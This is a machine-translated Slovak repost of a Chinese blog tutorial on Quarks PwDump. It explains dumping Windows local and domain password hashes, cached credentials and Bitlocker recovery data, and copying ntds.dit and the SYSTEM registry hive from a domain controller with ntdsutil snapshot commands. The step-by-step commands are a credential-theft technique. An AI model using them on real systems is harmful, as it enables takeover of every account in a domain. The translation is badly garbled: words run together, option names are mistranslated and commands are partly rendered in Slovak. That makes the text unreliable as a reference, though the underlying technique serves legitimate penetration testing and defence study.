Web

Útok a obrana - pomocou hesla Quarks PwDump získate heslá pre kontrolu domény

Attack Defense Use Quarks Pwdump Get Domain Control Passwords



Autor: antian365.com simeon

Kvarky PwDumpÁnokvarková doskaBol vyvinutý otvorený nástroj na extrakciu hesla používateľa, ktorý poskytuje najnovšiu verziu súčasného softvéru0,2b, jeho úplný zdrojový kód môže byťhttps://github.com/quarkslab/quarkspwdumpZískajte, momentálne podporujeWindows XP / 2003 / Vista / 7/2008Verzia a dosť stabilná. Môže chytiťoknáViaceré typy používateľských poverení v rámci platformy, vrátane: miestnych účtov, doménových účtov, doménových účtov uložených v pamäti aBitlocker. Autor vyvinul tento nástroj preto, že v súčasnosti neexistuje žiadny nástroj, ktorý by zachytil všetky typy súčasne.hashsBitlockerinformácie.



Adresa na stiahnutie zdrojového kódu nástroja:https://codeload.github.com/quarkslab/quarkspwdump/zip/master



V súčasnosti sa dá exportovať:



-Miestne účty NT / LM hash + históriaMiestneNT / LMHash+Historický prihlasovací záznam

-Doménové účty NT / LM hash + históriaV doméneNT / LMHash+Historický prihlasovací záznam

-Heslo domény v medzipamätiHeslo na správu domény v pamäti cache



-Informácie o obnovení nástroja Bitlocker (heslá na obnovenie a balíčky kľúčov)použitieBitlockerInformácie po zotavení zostali.

1.použitieKvarky PwDumpHodnota hash miestneho účtu

Kvarky PwDumpmusí byťDvaSpustite príkazový riadok a spustite priamoQuarksPwDumpv0.2b.exeAko je znázornené1Ako je znázornené, informácie o pomocníkovi sa zobrazujú predvolene a ich parametre majú nasledujúci význam:

-dhlExportujte miestnu hodnotu hash

-dhdcExportujte hodnoty hash riadené doménou do pamäte

-dhdMusí byť zadaná hodnota hash kontroly exportu doményNTDSspis

-ksExportBitlockerMusia byť uvedené informácieNTDSspis

-naprExportntdsspis

-histInformácie o histórii exportu, voliteľné

-tTyp exportu voliteľný predvolený export doJánDruhy.

-aleboExportujte súbory do miestnych

wKiom1bMEcqBKOoZAAKJAwo7QZk706.jpg

Obrázok1použitieKvarky PwDumpHodnota hash miestneho účtu

dva.použitieKvarky PwDumpExportovať inštanciu účtu

Použite príkaz 'QuarksPwDumpv0.2b.exe -dhl -o1.txtBude exportovať lokálny hash do aktuálneho adresára1.txtVykonaním príkazu zobrazíte počet exportovaných účtov, ako je to znázornené na obrázku.dvaZobrazené. Ukážte tam3Exportovať účty do1.txt,zapnúť1.txtMôžete vidieť konkrétny účet a hodnotu pre export hashovej hodnoty.

wKiom1bMEdqRlJsAAAIZA9S2qZo275.jpg

ObrázokdvaExportujte lokálny účet do súboru

3.SpolupracovaťntdsutilnástrojExportujte heslo pre kontrolu domény

Ntdsutil.exeJe jeden preAktívny adresárPoskytuje nástroje príkazového riadku na správu zariadení. byť použiteľnýNtdsutil.exeuskutočnenéAktívny adresárÚdržba, správa a kontrola databáz nad jednotlivými operáciami hostiteľa, vytváranie oddielov aplikačných adresárov a mazanie nepoužitýmiAktívny adresárnávod na inštaláciu(DCPromo.exe)Metadáta zanechané úspešne degradovaným radičom domény.NtdsutilMôže sa tiež použiť na získanie databázy riadenia doménntds.ditSpis, konkrétne poradie, je nasledovné:

1) Vytvorte snímku

ntdsutil snímka 'aktivovať inštanciu ntds' vytvoriť ukončiť ukončiť

dvaNtdsutilPripojte prehľad služby Active Directory

ntdsutil snímka 'mount {GUID}' ukončiť ukončená

{GUID}Pre dynamické snímanie, ako je znázornené3Zobrazené.

3) Skopírujte lokálny disk snímky

skopírujte MOUNT_POINT windows NTDS ntds.dit c: ntds.dit

4) Odpojte snímku

snímka ntdsutil 'odpojiť {GUID}' ukončiť

5) vymažte snímku

ntdsutil snapshot 'delete {GUID}' ukončiť ukončiť

wKioL1bMElawYN2WAAA_N5x0664225.png

Obrázok3Exportujte súbor so snímkou

Použite príkaz 'QuarksPwDump.exe --dump-hash-doména - súbor ntds c: ntds.ditBude exportovanéntds.ditHodnota hash v súbore je úplne exportovaná. Celý príklad je nasledovný:

snímka tdsutil 'aktivovať inštanciu ntds' vytvoriť ukončiť ukončiť

ntdsutil snapshot 'mount {a0455f6c-40c3-4b56-80a0-80261471522c}' ukončiť ukončiť

Momentka{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}Namontované ako100: $ SNAP_201212082315_VOLUM

EC $

kópia C: $ SNAP_201212082315_VOLUMEC $ windows NTDS ntds.dit c: ntds.dit

snímka ntdsutil 'odpojiť {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}' ukončiť

ntdsutil snapshot 'delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}' ukončiť ukončiť

QuarksPwDump.exe --dump-hash-doména --ntds-filec: ntds.dit

Popis: Najlepšie je získať hodnotu hash na rovnakom serveri,QuarksPwDump.exePoužite priamo na exportntds.ditNa serveri vykonajte príkaz exportu. Keby len budentds.ditPo lokálnom stiahnutí po kopírovaní sa môžu vyskytnúť chyby, ktoré nemožno prečítať. Jeden na internete už bol.NTDS.ditNástroj na rýchlu extrakciu hesla ntdsdump Čitateľ si to môže otestovať sám. Ak si chcete stiahnuťntds.ditNa miestne zotavenie je tiež potrebné vykonať 'reg save hklm system system.hive„, budesystémový úľsntds.ditSkopírujte všetko do lokálneho na získanie hesla na kontrolu domény.

Referenčný materiál

1. Kvarky PwDumphttp://blog.quarkslab.com/quarks-pwdump.html

NTDS.ditNástroj na rýchlu extrakciu hesla,http://www.secpulse.com/archives/6301.html



Tento článok je prenesený z blogu simeon2005 51CTO, pôvodného odkazu: http://blog.51cto.com/simeon/1744314